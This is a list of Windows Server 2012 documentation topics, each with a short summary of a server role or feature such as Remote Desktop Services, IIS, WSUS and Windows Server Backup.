  • Network Policy and Access Services Overview
    This topic provides an overview of Network Policy and Access Services in Windows Server 2012, including the specific role services of Network Policy Server (NPS), Health Registration Authority (HRA), and Host Credential Authorization Protocol (HCAP). Use the Network Policy and Access Services server role to deploy and configure Network Access Protection (NAP), secure wired and wireless access points, and RADIUS servers and proxies.
  • Print and Document Services Overview
    This is an overview of Print and Document Services, including Print Server, Distributed Scan Server, and Fax Server in Windows Server 2012.
  • Remote Desktop Services Overview
    Remote Desktop Services accelerates and extends desktop and application deployments to any device, improving remote worker efficiency, while helping to keep critical intellectual property secure and simplify regulatory compliance. Remote Desktop Services enables both a virtual desktop infrastructure (VDI) and session-based desktops, allowing users to work anywhere.
  • Security and Protection
    The table on this page provides links to available information for the IT pro about security technologies and features for Windows Server 2012 and Windows 8.
  • Telemetry Overview
    Find out about Windows Feedback Forwarder—a service that enables you to automatically send feedback to Microsoft by deploying a Group Policy setting to one or more organizational units. Windows Feedback Forwarder is available on all editions of Windows Server 2012.
  • Volume Activation Overview
    This technical overview for the IT pro describes the volume activation technologies in Windows Server 2012 and how your organization can benefit from using these technologies to deploy and manage volume licenses for a medium to large number of computers.
  • Web Server (IIS) Overview
    This document introduces the Web Server (IIS) role of Windows Server 2012, describes new IIS 8 features, and links to additional Microsoft and community information about IIS.
  • Windows Deployment Services Overview
    Windows Deployment Services enables you to deploy Windows operating systems over the network, which means that you do not have to install each operating system directly from a CD or DVD.
  • Windows Server Backup Feature Overview
    This section provides an overview of the Windows Server Backup feature and lists the new features in Windows Server 2012.
  • Windows Server Essentials Experience Overview
    With the Windows Server Essentials Experience role, you can take advantage of Windows Server 2012 R2 Essentials features such as simplified management using the server dashboard, data protection, Remote Web Access, and integration with Microsoft online services—all without enforcement of the Windows Server 2012 R2 Essentials locks and limits.
  • Windows Server Update Services Overview
    Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. By using WSUS, administrators can fully manage the distribution of updates that are released through Microsoft Update to computers in their network. In Windows Server 2012, this feature is integrated with the operating system as a server role. This topic provides an overview of this server role and more information about how to deploy and maintain WSUS.
  • Windows System Resource Manager Overview
    With Windows System Resource Manager for the Windows Server 2012 operating system, you can manage server processor and memory usage with standard or custom resource policies. Managing your resources can help ensure that all the services provided by a single server are available on an equal basis or that your resources will always be available to high-priority applications, services, or users.